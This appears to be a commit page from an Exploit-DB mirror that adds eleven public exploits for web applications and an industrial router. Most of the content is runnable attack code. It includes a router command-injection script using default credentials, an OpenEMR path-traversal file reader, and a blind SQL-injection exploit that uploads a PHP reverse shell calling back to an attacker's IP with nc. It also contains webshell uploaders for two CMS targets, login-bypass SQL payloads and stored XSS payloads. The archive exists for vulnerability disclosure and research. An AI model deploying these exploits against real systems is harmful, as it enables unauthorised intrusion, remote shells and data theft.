bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-07-06

Browse source 
11 changes to exploits/shellcodes

WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)
Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)
Simple Client Management System 1.0 - Remote Code Execution (RCE)
TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)
Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)
This commit is contained in:
Offensive Security 2021-07-06 05:02:03 +00:00
parent 5bd61e68a2
commit 540825f140
12 changed files with 778 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

77
exploits/hardware/webapps/50096.py Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)
# Date: 02.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.riconmobile.com
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
# Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
# WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#
import requests,sys,re
if len(sys.argv)<3:
print("Ricon Industrial Routers RCE")
print("Usage: ./ricon.py [ip] [cmd]")
sys.exit(17)
else:
ipaddr=sys.argv[1]
execmd=sys.argv[2]
data={'submit_class' :'admin',
'submit_button' :'netTest',
'submit_type' :'',
'action' :'Apply',
'change_action' :'',
'is_ping' :'0',
'ping_server_ip':';'+execmd}
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)

27
exploits/php/webapps/50086.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)
# Date: July 2, 2021
# Exploit Author: Mohammed Adam
# Vendor Homepage: https://wplearnmanager.com/
# Software Link: https://wordpress.org/plugins/learn-manager/
# Version: 1.1.2
# References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1
*Description:*
The plugin does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthenticated)
*Proof of Concept:*
POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
Connection: close
Upgrade-Insecure-Requests: 1
fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save
Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere

73
exploits/php/webapps/50087.rb Executable file
View file

@ -0,0 +1,73 @@
# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)
# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530
# Date: 2021-06-24
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz
# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml
# Version: < 5.0.2 (it means up to 5.0.1.7)
# Tested on: OpenEMR Version 5.0.1
# References: https://www.exploit-db.com/exploits/50037
# CVE: CVE-2019-14530
# CWE: CWE-22
# Patch: https://github.com/openemr/openemr/pull/2592/files
#!/usr/bin/env ruby
require 'pathname'
require 'httpx'
require 'docopt'
doc = <<~DOCOPT
OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
#{__FILE__} exploit <url> <filename> <username> <password> [--debug]
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<filename> Filename of the file to be read
<username> Username of the admin
<password> Password of the admin
--debug Display arguments
-h, --help Show this screen
Examples:
#{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass
#{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass
DOCOPT
def login(root_url, user, pass, http)
vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default"
params = {
'new_login_session_management' => '1',
'authProvider' => 'Default',
'authUser' => user,
'clearPass' => pass,
'languageChoice' => '1'
}
http.post(vuln_url, form: params).body.to_s
end
def exploit(root_url, filename, http)
vuln_url = "#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}"
http.get(vuln_url).body.to_s
end
begin
args = Docopt.docopt(doc)
pp args if args['--debug']
if args['exploit']
http = HTTPX.plugin(:cookies).plugin(:follow_redirects)
login(args['<url>'], args['<username>'], args['<password>'], http)
puts exploit(args['<url>'], args['<filename>'], http)
end
rescue Docopt::Exit => e
puts e.message
end

122
exploits/php/webapps/50088.py Executable file
View file

@ -0,0 +1,122 @@
# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
# Exploit Author: Geiseric
# Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075
# Date 02.07.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04
import requests
import os
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder
import string
import random
if len(sys.argv) < 4:
print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>')
exit()
url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
exp_url = '/Online_voting_system/admin/save_candidate.php'
login_url = '/Online_voting_system/admin/'
def first_get():
r = requests.get(url+login_url)
return r.headers['Set-Cookie']
def retrieve_first_admin():
print("[!] Stage 1: Finding a valid admin user through SQL Injection")
cookie = first_get()
count = 0
i=1
flag = True
admin = ''
while flag:
for j in range(32,128):
r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie})
if (r.elapsed.total_seconds() > 1):
admin += chr(j)
i+=1
sys.stdout.write("\rAdmin User: "+ admin)
sys.stdout.flush()
count=0
else:
if count == 100:
flag = False
break
else:
count += 1
print("\n[+] First admin user found!")
print("[!] Starting Stage 2")
return admin
def id_generator(size=6, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))+'.php'
def login_bypass(cookie):
username = retrieve_first_admin()
print("[!] Stage 2 started: Bypassing Login...")
r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie})
return cookie
def rev_write():
name = id_generator()
f = open(name,'w')
f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>')
f.close()
print('[+] Generated file with reverse shell: ' +name)
return name
def exploit(cookie):
print("[+] Uploading reverse shell...")
filename=rev_write()
multipart_data = MultipartEncoder(
{
# a file upload field
'image': (filename, open(filename, 'rb'), 'application/x-php'),
# plain text fields
'user_name': 'admin',
'rfirstname': 'test',
'rlastname': 'test',
'rgender': 'Male',
'ryear': '1st year',
'rmname': 'test',
'rposition': 'Governor',
'party': 'test',
'save': 'save'
}
)
r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie})
return filename
filename = exploit(login_bypass(first_get()))
print("[!] Triggering...")
input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.')
os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s')
print("[+] Cleaning up!")
os.system("rm "+ filename)

25
exploits/php/webapps/50089.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03 July 2021
# Exploit Author: Subhadip Nag
# Author Linkedin: www.linkedin.com/in/subhadip-nag-09/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP
# Description #
Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/OBCS/obcs/user/register.php
2) In the first name field, enter the payload: <script>alert(1)</script>
3) Click Register
4) Goto: http://localhost/OBCS/obcs/user/login.php
5) Enter your mobile number, password & click login
6) our XSS attack successfull
# PoC image
1) https://ibb.co/7C6g6nK

55
exploits/php/webapps/50090.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A
# Proof of Concept :
1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.
###################### REQUEST ##########################################
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc
####################### RESPONSE #########################################
HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8
Host Name: MRT
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Murat
System Boot Time: 6/25/2021, 2:51:40 PM
System Manufacturer: Dell Inc.
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
############################################################################

30
exploits/php/webapps/50091.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# Proof of Concept :
#Payload: <img src=x onerror=alert(1)>
#Injectable parameters : amount= and trcode=
###################### REQUEST ##########################################
POST /cman/members/Tithes.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/members/Tithes.php
Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc
Upgrade-Insecure-Requests: 1
amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=

38
exploits/php/webapps/50092.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
# Proof of Concept :
1-Go to http://target.com/cman/admin
2-Write the following payload to username and admin parameter and click login.
######################## REQUEST ###############################
POST /cman/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/admin/index.php
Cookie: PHPSESSID=cne5l4cs93krjqobput7nv7sjc
Upgrade-Insecure-Requests: 1
username=test&password=%27+or+%27a%27%3D%27a&login=
################################################################
PAYLOAD:
# username : test
# password : ' or 'a'='a

165
exploits/php/webapps/50093.py Executable file
View file

File diff suppressed because one or more lines are too long

61
exploits/php/webapps/50094.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)
# Date: July 4, 2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
# Version: 1.0
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali
#!/usr/bin/python
# Description:
# 1. This uses the SQL injection to bypass the admin login and create a new user
# 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server
# 3. the shell is called from the location
import requests
from colorama import Fore, Back, Style
'''
Description:
Using the sql injeciton to bypass the login and create a user.
This user creates a client with the shell as an image and uploads the shell.
The shell is called by the requests library for easier use.
------------------------------------------
Developed by - Ishan Saha & HackerCTF team (https://twitter.com/hackerctf)
------------------------------------------
'''
# Variables : change the URL according to need
URL="http://192.168.0.248/client/"
shellcode = "<?php system($_GET['cmd']);?>"
filename = "shell.php"
authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"}
createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"}
userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"}
shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"}
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
ShellSession = requests.Session()
response = ShellSession.get(URL)
response = ShellSession.post(URL + "admin/index.php",data=authdata)
response = ShellSession.post(URL + "admin/regester.php",data=createuser)
response = ShellSession.post(URL,data=userlogin)
response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")})
location = URL +"img/" + filename
#print statements
print(format_text("Target",URL),end='')
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
print(format_text("shell location",location),end='')
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
while True:
cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
if cmd == 'exit':
break
print(ShellSession.get(location + "?cmd="+cmd).content.decode())

94
exploits/php/webapps/50095.py Executable file
View file

@ -0,0 +1,94 @@
# Exploit Title: TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)
# Date: 07/04/2021
# Exploit Author: Mevlüt Akçam
# Software Link: https://github.com/textpattern/textpattern
# Vendor Homepage: https://textpattern.com/
# Version: 4.9.0-dev
# Tested on: 20.04.1-Ubuntu
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup as bs4
import json
import string
import random
import argparse
# Colors
RED="\033[91m"
GREEN="\033[92m"
RESET="\033[0m"
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--url', required=True, action='store', help='Target url')
parser.add_argument('-u', '--user', required=True, action='store', help='Username')
parser.add_argument('-p', '--password', required=True, action='store', help='Password')
args = parser.parse_args()
URL=args.url
uname=args.user
passwd=args.password
session=requests.Session()
def login(uname,passwd):
data={'lang':'en','p_userid':uname,'p_password':passwd}
r_login=session.post(URL+"/textpattern/index.php",data=data, verify=False)
if r_login.status_code == 200:
print(GREEN,f"[+] Login successful , your cookie : {session.cookies['txp_login']}",RESET)
else:
print(RED,f"[-] Login failed",RESET)
exit()
def get_token():
print(GREEN,f"[+] Getting token ",RESET)
r_token=session.get(URL+"/textpattern/index.php?event=plugin")
soup = bs4(r_token.text, 'html.parser')
textpattern = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-1]
textpattern = json.loads(textpattern)
return textpattern['_txp_token']
def upload():
file_name=''.join(random.choice(string.ascii_lowercase) for _ in range(10))
file={
'theplugin':(
file_name+".php",
"""
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus>
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>
</pre>
</body>
</html>
<!-- """+file_name+" -->"
),# The file_name is used to verify that the file has been uploaded.
'install_new':(None,'Upload'),
'event':(None,'plugin'),
'step':(None,'plugin_upload'),
'_txp_token':(None,get_token()),
}
r_upload=session.post(URL+"/textpattern/index.php",verify=False,files=file)
if file_name in r_upload.text:
print(GREEN,f"[+] Shell uploaded",RESET)
print(GREEN,f"[+] Webshell url : {URL}/textpattern/tmp/{file_name}.php",RESET)
else:
print(RED,f"[-] Shell failed to load",RESET)
print(RED,f"[-] Bye",RESET)
exit()
if __name__=="__main__":
login(uname,passwd)
upload()
print(GREEN,f"[+] Bye",RESET)

11
files_exploits.csv
View file

@ -44224,3 +44224,14 @@ id,file,description,date,author,type,platform,port
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php,
50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php,
50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,
50086,exploits/php/webapps/50086.txt,"WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)",2021-07-05,"Mohammed Adam",webapps,php,
50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",2021-07-05,"Alexandre ZANNI",webapps,php,
50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",2021-07-05,Geiseric,webapps,php,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,
50090,exploits/php/webapps/50090.txt,"Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)",2021-07-05,"Murat DEMİRCİ",webapps,php,
50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Murat DEMİRCİ",webapps,php,
50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",2021-07-05,"Murat DEMİRCİ",webapps,php,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",2021-07-05,"Ron Jost",webapps,php,
50094,exploits/php/webapps/50094.py,"Simple Client Management System 1.0 - Remote Code Execution (RCE)",2021-07-05,"Ishan Saha",webapps,php,
50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,
50096,exploits/hardware/webapps/50096.py,"Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)",2021-07-05,LiquidWorm,webapps,hardware,

Can't render this file because it is too large.